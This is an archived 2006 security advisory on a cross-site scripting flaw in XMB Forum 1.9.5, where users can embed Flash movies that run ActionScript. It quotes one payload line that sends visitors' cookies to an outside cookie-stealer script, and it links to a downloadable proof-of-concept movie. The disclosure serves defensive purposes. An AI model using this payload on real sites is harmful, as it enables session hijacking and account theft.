XMB-1.9.5-Final.txt

XMB-1.9.5-Final.txt: Posted Apr 12, 2006; Authored by r0xes | Site dynxss.whiteacid.org; XMB Forum 1.9.5 allows users to embed malicious flash movies in their posts, which leads to XSS.; tags | advisory; SHA-256 | 5491bd4bf16f495546a7405a608272932cd71a259a40fd1cf523140cb7394d7e; Download | Favorite | View

XMB-1.9.5-Final.txt

XMB Forum 1.9.5 (I have not tested this on earlier versions)
allows users to embed flash (.swf) videos in their posts.
Normally, you could set an option on the <object> tag to say that ActionScript cannot run, but in this case we don't.

The way we execute our code is by making a flash movie containing the Actionscript code:
getURL("javascript:document.location='http://my-site.com/path/to/cookiestealer.php?cookie='+document.cookie;");

An example video + .fla script can be downloaded at my site: http://dynxss.whiteacid.org/videos/xmbforum_1.9.5-final.rar

XMB has been notified, expect this to be fixed in a few days.

comments, questions, flames, etc.
r0xes [dot] ratm [at] gmail [dot] com

Top Authors In Last 30 Days

Red Hat 219 files
indoushka 83 files
Ubuntu 79 files
Gentoo 36 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,707)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,485)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,737)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

XMB-1.9.5-Final.txt

XMB-1.9.5-Final.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

XMB-1.9.5-Final.txt

Share This

XMB-1.9.5-Final.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems